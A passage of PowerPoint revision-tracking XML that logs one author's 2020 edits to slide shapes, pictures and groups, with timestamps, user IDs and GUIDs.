      <pc:chgData name="Harith Al-Sahaf" userId="1431218d-04c9-4f98-a5bc-1cc5c49498a0" providerId="ADAL" clId="{8F4BCD20-2426-4217-8768-11CB227F084C}" dt="2020-07-16T02:31:37.946" v="0"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Harith Al-Sahaf" userId="1431218d-04c9-4f98-a5bc-1cc5c49498a0" providerId="ADAL" clId="{8F4BCD20-2426-4217-8768-11CB227F084C}" dt="2020-07-16T02:31:37.946" v="0"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1665816769" sldId="256"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Harith Al-Sahaf" userId="1431218d-04c9-4f98-a5bc-1cc5c49498a0" providerId="ADAL" clId="{8F4BCD20-2426-4217-8768-11CB227F084C}" dt="2020-07-16T02:31:37.946" v="0"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1665816769" sldId="256"/>
            <ac:spMk id="3" creationId="{E2346EBA-D898-4D6A-A7A1-0D17AC0663CE}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="Harith Al-Sahaf" userId="1431218d-04c9-4f98-a5bc-1cc5c49498a0" providerId="ADAL" clId="{2E64D1AE-71DF-4ABC-A50D-2C00DA339E65}"/>
    <pc:docChg chg="undo custSel addSld delSld modSld">
      <pc:chgData name="Harith Al-Sahaf" userId="1431218d-04c9-4f98-a5bc-1cc5c49498a0" providerId="ADAL" clId="{2E64D1AE-71DF-4ABC-A50D-2C00DA339E65}" dt="2020-09-16T12:59:11.167" v="139" actId="2696"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Harith Al-Sahaf" userId="1431218d-04c9-4f98-a5bc-1cc5c49498a0" providerId="ADAL" clId="{2E64D1AE-71DF-4ABC-A50D-2C00DA339E65}" dt="2020-09-16T12:19:19.476" v="2" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2083284642" sldId="319"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Harith Al-Sahaf" userId="1431218d-04c9-4f98-a5bc-1cc5c49498a0" providerId="ADAL" clId="{2E64D1AE-71DF-4ABC-A50D-2C00DA339E65}" dt="2020-09-16T12:19:19.476" v="2" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2083284642" sldId="319"/>
            <ac:spMk id="2" creationId="{B5CBC005-5335-4EA4-ADF1-A13726956CCD}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp mod">
        <pc:chgData name="Harith Al-Sahaf" userId="1431218d-04c9-4f98-a5bc-1cc5c49498a0" providerId="ADAL" clId="{2E64D1AE-71DF-4ABC-A50D-2C00DA339E65}" dt="2020-09-16T12:59:04.896" v="138" actId="1035"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3284436390" sldId="320"/>
        </pc:sldMkLst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" creationId="{437DE84F-1142-46BA-AB55-B1049C47626C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9" creationId="{77A57E50-FF06-4761-A01D-B0782710212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" creationId="{97BCB77B-E31A-4C64-99C1-02DE5D26DF9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" creationId="{21ED0AE8-F4C7-42EF-AA1A-C4FDC042177F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" creationId="{FE3208B0-F0A8-4FD2-A7DF-EEC9E1277097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" creationId="{79D2916B-E278-4530-B900-0196AACFBEC6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" creationId="{3A5C674B-4781-4136-BA44-9F85530E3F3F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" creationId="{3592626D-3649-45D2-BAC7-B14172D4D3A4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8" creationId="{18C86A07-37B2-4B3B-9996-34AC0D209AB4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9" creationId="{13A48917-92B5-4D50-8332-272660037C9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0" creationId="{6C0496E9-870D-496B-87C6-6CE0165BFE4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1" creationId="{46E98041-323F-4935-941E-AEF095EAC9D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2" creationId="{E5AEF380-8E91-4F30-A868-EBE60E56B795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3" creationId="{16D6DDCD-4DB0-44CC-9758-6D68C1643FD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4" creationId="{D9D6318A-81DF-4B48-B776-443D14EEA71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5" creationId="{385742DF-6C36-46B3-9D90-4C845BE8C7FC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6" creationId="{FDF811D0-F3E1-4C42-A840-57F378F5B682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7" creationId="{9540C07B-76A1-4C01-85ED-F2495720218B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8" creationId="{2C772B37-F1F7-4265-A44F-4D912D69FDC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29" creationId="{39147519-1CBD-472C-8616-1F021C53DA9D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0" creationId="{55EDF964-06D5-4FF7-B8BA-61371772A8C5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1" creationId="{576EE20A-AFAA-47BB-B285-56DBCC17800C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2" creationId="{A853CB7D-20C2-4B9C-A2C3-66EE0B2043FF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3" creationId="{E2A6C6F5-6040-4997-83B4-95006DCCAB0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4" creationId="{7EBE6686-8377-47BB-A391-DFDF09BAE615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5" creationId="{3234F5AD-C48A-42D4-A050-7F22D14BCE2F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6" creationId="{D801604E-78E9-4898-BE93-226124EB06F4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7" creationId="{7E26F288-EF8F-43F5-A9FB-1B659416934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8" creationId="{949E135E-CDD5-4325-958D-1F8E9A488E7B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39" creationId="{FF7687BE-4735-48AE-B0AE-48B83330A89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0" creationId="{5240A396-314A-48F6-83B7-42DCC0289C91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1" creationId="{BFBB8969-9B48-4598-908E-212ACF7F61B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2" creationId="{99328988-D049-412B-94CC-CE6CDC12EC2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3" creationId="{A73B813F-B389-4294-8DF6-EAD6298616C8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4" creationId="{981CF619-61ED-415C-B821-3C450CE3679C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5" creationId="{743BAD7D-E35F-497C-8FDC-20822C517065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6" creationId="{2C2DB759-CE65-4BFB-BAD9-59CF333B8D9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7" creationId="{B8790A66-8482-4FE1-AC59-19F5F094491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8" creationId="{313BAEE2-D6F8-4A64-995E-BDC97AE5D3FF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49" creationId="{C599CE94-BDD6-4414-BE0D-EB7EDF1EA3E8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0" creationId="{1CFE2690-3FCB-4E59-B374-D8040E993A33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1" creationId="{E252B68B-EFA7-400E-A6CD-CA760E2120CF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2" creationId="{2ED00C75-8AA5-4C7C-B1EA-559FCF8D284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3" creationId="{EC066D3A-BD6E-44E8-B2F2-8E1D60C34D13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4" creationId="{67F527C8-FC06-4916-9870-A6E71653D308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5" creationId="{9820C202-C1D2-418F-B6E2-F31E7CC33EE3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6" creationId="{F8ABE01F-E04C-4185-AB90-2B1B1CC84B57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7" creationId="{1E42026A-4BEC-4FED-B79A-E7EFF07B6AA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8" creationId="{F04BB986-1AF0-406E-9453-603D7DCA0A6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59" creationId="{99EEADCB-9274-48D7-B3DD-197E24E1EA7E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0" creationId="{C936EE4D-BF98-4F3C-809A-1CB4C5E1C9E1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1" creationId="{105C75D5-E24F-444A-8BAD-C8878CC099A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2" creationId="{6BEE8EF8-5A78-468A-8341-09647B684A72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3" creationId="{826698E4-8A34-4B74-AAC9-6C23DDEC9995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4" creationId="{68A90DAA-1286-4ABA-A648-89C1E8953058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5" creationId="{835204F6-B3B2-46E9-99B6-82BFD6F5C4EE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6" creationId="{2C31E1DC-40E6-4BC0-821C-94D6BC39A3FC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7" creationId="{43248E53-7301-45E6-8A23-3D1F8460EF42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8" creationId="{8DC8105C-3DBA-46A8-ACD3-364EF8273453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69" creationId="{4B809098-38F3-409A-831D-8941AB19F807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0" creationId="{2124E4FA-E6E3-4BBB-83B6-64E78588AA26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1" creationId="{F918725A-13AA-4E24-8391-39B143D76368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2" creationId="{30AED163-CC6F-42FB-AE90-041AED7B44C5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3" creationId="{B8E367AF-E8D7-4A88-8B0B-CFEEEF7CDCB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4" creationId="{B18C4512-FDED-4B79-8196-0AEB564381EF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5" creationId="{AB4BC105-F7D8-4323-B69F-4CF0DA2333E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6" creationId="{0CBDBF50-E178-4030-97C7-86DA998F74A1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7" creationId="{57295120-C853-46AD-B4CC-F117A6E22EC1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8" creationId="{319F4C61-F04E-48B3-9D0F-361FF9B8A1B6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79" creationId="{F05CFE20-9717-467C-98AE-7250D92F7302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0" creationId="{B616F645-DB45-435D-B1FE-D65F30197364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1" creationId="{FBBAF5B6-6D44-4692-A736-076D57B99164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2" creationId="{E871A77F-8234-4400-BD82-D433B1D6553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3" creationId="{6BFEBA62-A4F7-4B11-A33D-D71473F0A2D7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4" creationId="{DDFCFBF0-1471-4921-BECC-CAA73175CA80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5" creationId="{08F3CFAD-3DCD-4500-8BD3-F4D126900FC8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6" creationId="{2D6E5B56-D2CE-4B12-AC54-8EE5667923F1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7" creationId="{E96D3017-317E-4A6C-A1F0-80FC9C32793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8" creationId="{77030BB6-137E-444E-8E66-3CB0F53C3FDD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89" creationId="{EB21C6DA-7FFC-4EF1-B62C-2F354CB4AB2A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90" creationId="{53D28733-E312-4186-9254-218868487FDE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91" creationId="{0FA7C965-D03E-495D-BFE9-B8DD55978984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92" creationId="{ECD9A50D-FF84-436D-899F-D0F2AE3B2049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93" creationId="{A0B4B614-F04A-4F13-A526-B77F7BE45698}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add 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94" creationId="{BB3EC029-5BD8-4163-A411-1ADA014C08CE}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="ad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95" creationId="{C429611E-611D-4238-A283-EB4B87EEA348}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Harith Al-Sahaf" userId="1431218d-04c9-4f98-a5bc-1cc5c49498a0" providerId="ADAL" clId="{2E64D1AE-71DF-4ABC-A50D-2C00DA339E65}" dt="2020-09-16T12:59:04.896" v="138" actId="1035"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3284436390" sldId="320"/>
            <ac:spMk id="98" creationId="{6F9D19D9-C35A-4C18-A4EC-C963F4BF311E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0" creationId="{9D03E98B-B1DC-44D1-BCE2-B2454854E7B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1" creationId="{A03FE956-8234-4A90-86DB-F50AA5B23ED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2" creationId="{95F3D1F2-0D59-40D7-813F-BBD5F3F235B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3" creationId="{8E7CE872-5ECF-4415-B73F-D2132D6F99E4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4" creationId="{827E3712-7D83-4659-BB12-D256ADB4D9A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5" creationId="{B5DA3ACE-6253-4B34-A26D-2E3BC0866445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6" creationId="{AD4CD9EB-F508-464E-A564-F03A4E0C8311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7" creationId="{56CA1A3A-91E9-40FF-91B6-B32AAEA874F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8" creationId="{84D834F6-1D06-4DA5-9566-4DBF1E061E4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09" creationId="{8DA8204E-C07B-4B45-B88A-6980B915B41A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0" creationId="{DA7AA19D-B689-409C-97C8-60256BB38CFE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1" creationId="{8A0A5FD2-5F04-488A-B173-926580F91779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2" creationId="{1A8E9985-A087-4784-ABF0-86DA65C43D1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3" creationId="{D6B82F54-2137-40EC-A58C-780C669F4645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4" creationId="{0075616B-F938-4291-BD25-80B51E16D3EE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5" creationId="{A0C987D4-AB31-48C9-983B-3CC668DFAA67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6" creationId="{A153B9B4-D53D-49E1-A7A9-A0E31C29707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7" creationId="{99EEBE8F-A3B1-40B6-877E-B00CDC5860C0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8" creationId="{C4053878-3917-4FDC-B0EA-0F8A8851A932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19" creationId="{EDE6FC04-007F-4353-A28D-D822D414B626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0" creationId="{4B959538-646B-4270-8E9F-7569E1BD388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1" creationId="{95F84367-FB6E-42AE-B3F4-E1C1D12B7EBC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2" creationId="{A20E8985-6A79-432F-8378-58947723AC17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3" creationId="{A6CC98C5-82B1-4C03-8384-9CC90575D231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4" creationId="{DA9CCBB5-2C9E-4131-911F-075746E8893D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5" creationId="{6421CE07-5FB1-4EEC-8204-15F9021E2EF2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6" creationId="{78C2D1FA-2CB2-450B-80D4-6B881865024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7" creationId="{B40DB397-0F38-4A41-B820-E08531413FCE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8" creationId="{4244366F-B4D6-4069-A26A-4CA33776867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29" creationId="{CFB79233-53B8-4C80-94A2-50702AD9E784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0" creationId="{8538C7F1-808C-433E-A379-2434C149F48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1" creationId="{BDA42B94-B1FC-4D63-A79C-13E00802C8C4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2" creationId="{80444916-B031-4F5C-B8BB-5235C272EF3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3" creationId="{376C221B-4BEE-480F-8A73-A3357C3C7A87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4" creationId="{4D4147DC-0903-47FE-9AD6-6BC7E0133B12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5" creationId="{8454B379-A955-4D62-8A48-30FC4331660D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6" creationId="{B8CE7B62-B514-4358-9E75-F5277EE161AE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7" creationId="{917A85B7-A24F-4ABF-BAF7-34FC2E1BF201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8" creationId="{6FC78FDC-FE28-408E-AA91-88B3D6B97F24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39" creationId="{D298E6A9-2544-4823-A1C2-55F857D5FACF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0" creationId="{288AE63B-4416-4BC8-B689-A356CEAF101A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1" creationId="{450EC8BA-767F-4498-A1B6-3FD030B0547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2" creationId="{91735C23-0F1E-46C0-B422-80FE6D1E17E6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3" creationId="{C454836D-F702-45EF-8FD0-0E5F21809C50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4" creationId="{A9F66587-DAF7-4EB5-B27B-9F6A9AF3B19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5" creationId="{235839ED-52D6-49BB-A1A3-7BC3702AA44D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6" creationId="{525A0BB0-9281-4441-AA2F-6A4FCBE93EB9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7" creationId="{E2318BC9-AE6F-49EE-B286-94D7292218AD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8" creationId="{A053EB10-FAD8-43A3-8FC6-714455B5C195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49" creationId="{F81A0370-C207-48B4-ABA1-BF0AB465DF0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0" creationId="{EEE31A70-40B1-467D-8B81-47C11811A809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1" creationId="{51106AC2-ED5A-4AB1-A0AB-364B70B2AFFE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2" creationId="{06F67DFA-92BC-4B2D-8DE0-C2A3D5ED7929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3" creationId="{541FF26B-06E3-4F43-AE1F-7576FD4DD443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4" creationId="{8A730C26-DC88-42B2-87FD-71D87F40E0E5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5" creationId="{24BB01B1-34FE-4A71-AE44-CC2A61AB8F01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6" creationId="{A92DECBB-32A2-426E-8317-9478EB46841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7" creationId="{7E6AD805-8A0E-4F94-AACA-C638F3CB8054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8" creationId="{C2E7E1F9-1CAA-4F91-9D8E-F97BC5977C57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59" creationId="{7F97D060-CE4C-4E3C-8D8C-B551FED04F7C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0" creationId="{D1389D32-B9F8-49CF-87D2-DFC96AC37894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1" creationId="{5877D4CD-CFF6-462E-B485-3AB33607C90C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2" creationId="{DD6E3ACA-FC7D-4B3D-82D8-963DF29C337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3" creationId="{D1DD8877-2FB0-4D2A-80BE-C50CF7977585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4" creationId="{F5BE1689-3FEF-46AB-86B5-D78AC03473E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5" creationId="{AF14AD81-CAE5-4FE2-B7D6-9C9B87C178DD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6" creationId="{A98BD293-1543-4179-AD76-9A7715EEE03A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7" creationId="{1BA8E152-DAD2-423E-B6C6-6298F2D8867C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8" creationId="{523517E7-2030-497A-9E34-AC2EB3876EF9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69" creationId="{12D23008-8208-4134-BB70-55AB46EFF70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0" creationId="{B9654387-C84A-4DC1-9A43-BFA5DB297B20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1" creationId="{84C32623-C732-4122-8943-80FC154BD169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2" creationId="{5BBE4675-F5B0-486B-89E2-EE036E17CF8B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3" creationId="{5F49D1D4-C014-4B7A-BF5D-75D2F7C19A9D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4" creationId="{F9C9CF64-A36A-495F-A133-3E7624C99757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5" creationId="{914F9318-C474-4DEC-A491-CCF1A9DFB710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6" creationId="{9BFDF513-924D-4E33-BC53-80DE74A93D32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7" creationId="{74EC5C69-F6BA-454A-B776-277B81B1E80F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8" creationId="{EF2B2A3C-018A-46F5-A451-B4F9DCCD05C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79" creationId="{08867FEC-5AE6-417F-BB2F-0F6946556759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80" creationId="{62E1B4D9-79A7-41A8-9F27-310F80B35F98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81" creationId="{989ED0C6-0D28-4A96-84F2-B6E4894C5791}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Harith Al-Sahaf" userId="1431218d-04c9-4f98-a5bc-1cc5c49498a0" providerId="ADAL" clId="{2E64D1AE-71DF-4ABC-A50D-2C00DA339E65}" dt="2020-09-16T12:31:23.012" v="24"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3284436390" sldId="320"/>
            <ac:spMk id="182" creationId="{5E015705-F39C-488A-9EEA-1A5154D65B59}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:grpChg chg="add mod">
          <ac:chgData name="Harith Al-Sahaf" userId="1431218d-04c9-4f98-a5bc-1cc5c49498a0" providerId="ADAL" clId="{2E64D1AE-71DF-4ABC-A50D-2C00DA339E65}" dt="2020-09-16T12:31:23.012" v="24"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3284436390" sldId="320"/>
            <ac:grpSpMk id="7" creationId="{2363597F-B1D0-40B7-AABB-AA8CFBC0E4A1}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="add mod">
          <ac:chgData name="Harith Al-Sahaf" userId="1431218d-04c9-4f98-a5bc-1cc5c49498a0" providerId="ADAL" clId="{2E64D1AE-71DF-4ABC-A50D-2C00DA339E65}" dt="2020-09-16T12:31:23.012" v="24"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3284436390" sldId="320"/>
            <ac:grpSpMk id="10" creationId="{9298597C-15F9-4444-96B6-046323757E07}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="add del mod">
          <ac:chgData name="Harith Al-Sahaf" userId="1431218d-04c9-4f98-a5bc-1cc5c49498a0" providerId="ADAL" clId="{2E64D1AE-71DF-4ABC-A50D-2C00DA339E65}" dt="2020-09-16T12:58:31.555" v="116" actId="478"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3284436390" sldId="320"/>
            <ac:grpSpMk id="97" creationId="{FDEFB0BA-542A-42E3-8AC0-BC8709893DEF}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Harith Al-Sahaf" userId="1431218d-04c9-4f98-a5bc-1cc5c49498a0" providerId="ADAL" clId="{2E64D1AE-71DF-4ABC-A50D-2C00DA339E65}" dt="2020-09-16T12:31:23.012" v="24"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3284436390" sldId="320"/>
            <ac:grpSpMk id="99" creationId="{C70528C4-AC27-467D-8A20-B5C48CE58030}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Harith Al-Sahaf" userId="1431218d-04c9-4f98-a5bc-1cc5c49498a0" providerId="ADAL" clId="{2E64D1AE-71DF-4ABC-A50D-2C00DA339E65}" dt="2020-09-16T12:31:23.012" v="24"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3284436390" sldId="320"/>
            <ac:picMk id="6" creationId="{BA69E1F3-67A0-4B56-A944-294BD3DD4D7E}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Harith Al-Sahaf" userId="1431218d-04c9-4f98-a5bc-1cc5c49498a0" providerId="ADAL" clId="{2E64D1AE-71DF-4ABC-A50D-2C00DA339E65}" dt="2020-09-16T12:57:59.468" v="103" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3284436390" sldId="320"/>
            <ac:picMk id="12" creationId="{DB9FAB06-E61E-40FC-A44A-5751943E5854}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del mod ord">
          <ac:chgData name="Harith Al-Sahaf" userId="1431218d-04c9-4f98-a5bc-1cc5c49498a0" providerId="ADAL" clId="{2E64D1AE-71DF-4ABC-A50D-2C00DA339E65}" dt="2020-09-16T12:57:42.886" v="93"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3284436390" sldId="320"/>
            <ac:picMk id="184" creationId="{AA4B1314-54BC-4DC4-BF8C-6544225E5333}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del mod ord">
          <ac:chgData name="Harith Al-Sahaf" userId="1431218d-04c9-4f98-a5bc-1cc5c49498a0" providerId="ADAL" clId="{2E64D1AE-71DF-4ABC-A50D-2C00DA339E65}" dt="2020-09-16T12:57:42.616" v="80"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3284436390" sldId="320"/>
            <ac:picMk id="186" creationId="{1EFB6A12-36B8-4E33-BFC1-26D294C970AE}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del mod ord">
          <ac:chgData name="Harith Al-Sahaf" userId="1431218d-04c9-4f98-a5bc-1cc5c49498a0" providerId="ADAL" clId="{2E64D1AE-71DF-4ABC-A50D-2C00DA339E65}" dt="2020-09-16T12:58:12.581" v="113" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3284436390" sldId="320"/>
            <ac:picMk id="188" creationId="{0D0253E0-6964-4AE8-B3DF-65622A86B5BE}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del mod ord">
          <ac:chgData name="Harith Al-Sahaf" userId="1431218d-04c9-4f98-a5bc-1cc5c49498a0" providerId="ADAL" clId="{2E64D1AE-71DF-4ABC-A50D-2C00DA339E65}" dt="2020-09-16T12:58:47.332" v="127" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3284436390" sldId="320"/>
            <ac:picMk id="190" creationId="{91F9D90D-2C0F-4040-8F67-B4D2A698401C}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="mod ord">
          <ac:chgData name="Harith Al-Sahaf" userId="1431218d-04c9-4f98-a5bc-1cc5c49498a0" providerId="ADAL" clId="{2E64D1AE-71DF-4ABC-A50D-2C00DA339E65}" dt="2020-09-16T12:58:53.549" v="128" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3284436390" sldId="320"/>
            <ac:picMk id="3072" creationId="{932F06BF-A620-4295-9E34-18D77DF5D649}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="mod">
          <ac:chgData name="Harith Al-Sahaf" userId="1431218d-04c9-4f98-a5bc-1cc5c49498a0" providerId="ADAL" clId="{2E64D1AE-71DF-4ABC-A50D-2C00DA339E65}" dt="2020-09-16T12:31:23.012" v="24"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3284436390" sldId="320"/>
            <ac:picMk id="3079" creationId="{035C026B-B4D2-47A2-9193-9AA8CE015630}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Harith Al-Sahaf" userId="1431218d-04c9-4f98-a5bc-1cc5c49498a0" providerId="ADAL" clId="{2E64D1AE-71DF-4ABC-A50D-2C00DA339E65}" dt="2020-09-16T12:26:55.949" v="15" actId="207"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4237543499" sldId="322"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Harith Al-Sahaf" userId="1431218d-04c9-4f98-a5bc-1cc5c49498a0" providerId="ADAL" clId="{2E64D1AE-71DF-4ABC-A50D-2C00DA339E65}" dt="2020-09-16T12:26:55.949" v="15" actId="207"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4237543499" sldId="322"/>
            <ac:spMk id="3" creationId="{BFEA7973-952D-49B9-8EE4-00FFE189A9A1}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Harith Al-Sahaf" userId="1431218d-04c9-4f98-a5bc-1cc5c49498a0" providerId="ADAL" clId="{2E64D1AE-71DF-4ABC-A50D-2C00DA339E65}" dt="2020-09-16T12:25:50.082" v="4" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3425816137" sldId="330"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Harith Al-Sahaf" userId="1431218d-04c9-4f98-a5bc-1cc5c49498a0" providerId="ADAL" clId="{2E64D1AE-71DF-4ABC-A50D-2C00DA339E65}" dt="2020-09-16T12:25:50.082" v="4" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3425816137" sldId="330"/>
            <ac:spMk id="2" creationId="{1B44D0FD-B02B-478D-9384-4C713615B14A}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Harith Al-Sahaf" userId="1431218d-04c9-4f98-a5bc-1cc5c49498a0" providerId="ADAL" clId="{2E64D1AE-71DF-4ABC-A50D-2C00DA339E65}" dt="2020-09-16T12:26:13.843" v="9" actId="207"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2307828219" sldId="334"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Harith Al-Sahaf" userId="1431218d-04c9-4f98-a5bc-1cc5c49498a0" providerId="ADAL" clId="{2E64D1AE-71DF-4ABC-A50D-2C00DA339E65}" dt="2020-09-16T12:26:13.843" v="9" actId="207"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2307828219" sldId="334"/>
            <ac:spMk id="3" creationId="{64DC49E0-DAB7-443D-B86D-9601B50E6BF5}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Harith Al-Sahaf" userId="1431218d-04c9-4f98-a5bc-1cc5c49498a0" providerId="ADAL" clId="{2E64D1AE-71DF-4ABC-A50D-2C00DA339E65}" dt="2020-09-16T12:26:34.113" v="12" actId="207"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3960037050" sldId="335"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Harith Al-Sahaf" userId="1431218d-04c9-4f98-a5bc-1cc5c49498a0" providerId="ADAL" clId="{2E64D1AE-71DF-4ABC-A50D-2C00DA339E65}" dt="2020-09-16T12:26:34.113" v="12" actId="207"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3960037050" sldId="335"/>
            <ac:spMk id="3" creationId="{FAAF6B5B-C52B-4D14-B675-4573D6CC6690}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="delSp modSp new del mod">
        <pc:chgData name="Harith Al-Sahaf" userId="1431218d-04c9-4f98-a5bc-1cc5c49498a0" providerId="ADAL" clId="{2E64D1AE-71DF-4ABC-A50D-2C00DA339E65}" dt="2020-09-16T12:59:11.167" v="139" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2134897514" sldId="336"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Harith Al-Sahaf" userId="1431218d-04c9-4f98-a5bc-1cc5c49498a0" providerId="ADAL" clId="{2E64D1AE-71DF-4ABC-A50D-2C00DA339E65}" dt="2020-09-16T12:32:00.050" v="29" actId="368"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2134897514" sldId="336"/>
            <ac:spMk id="2" creationId="{8A04A1C7-98A7-4B96-8B26-95B2CF20DB9C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Harith Al-Sahaf" userId="1431218d-04c9-4f98-a5bc-1cc5c49498a0" providerId="ADAL" clId="{2E64D1AE-71DF-4ABC-A50D-2C00DA339E65}" dt="2020-09-16T12:32:00.050" v="31" actId="368"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2134897514" sldId="336"/>
            <ac:spMk id="3" creationId="{6EE89018-8FB6-4BF5-B290-115AF4294CA4}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="del mod">
          <ac:chgData name="Harith Al-Sahaf" userId="1431218d-04c9-4f98-a5bc-1cc5c49498a0" providerId="ADAL" clId="{2E64D1AE-71DF-4ABC-A50D-2C00DA339E65}" dt="2020-09-16T12:32:07.493" v="38" actId="21"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2134897514" sldId="336"/>
            <ac:picMk id="6" creationId="{7440D783-06FA-4362-BBF0-7EAAECB7208E}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="Harith Al-Sahaf" userId="1431218d-04c9-4f98-a5bc-1cc5c49498a0" providerId="ADAL" clId="{CEC860C5-413A-41CC-B4B0-35EBEFFBF910}"/>
    <pc:docChg chg="custSel modSld">
      <pc:chgData name="Harith Al-Sahaf" userId="1431218d-04c9-4f98-a5bc-1cc5c49498a0" providerId="ADAL" clId="{CEC860C5-413A-41CC-B4B0-35EBEFFBF910}" dt="2020-07-16T02:26:47.323" v="42" actId="113"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp modAnim">
        <pc:chgData name="Harith Al-Sahaf" userId="1431218d-04c9-4f98-a5bc-1cc5c49498a0" providerId="ADAL" clId="{CEC860C5-413A-41CC-B4B0-35EBEFFBF910}" dt="2020-07-16T02:09:27.411" v="7" actId="115"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1350560251" sldId="258"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Harith Al-Sahaf" userId="1431218d-04c9-4f98-a5bc-1cc5c49498a0" providerId="ADAL" clId="{CEC860C5-413A-41CC-B4B0-35EBEFFBF910}" dt="2020-07-16T02:09:27.411" v="7" actId="115"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1350560251" sldId="258"/>
            <ac:spMk id="3" creationId="{8764EF96-4A03-4204-92F3-3C2097BF277B}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod">
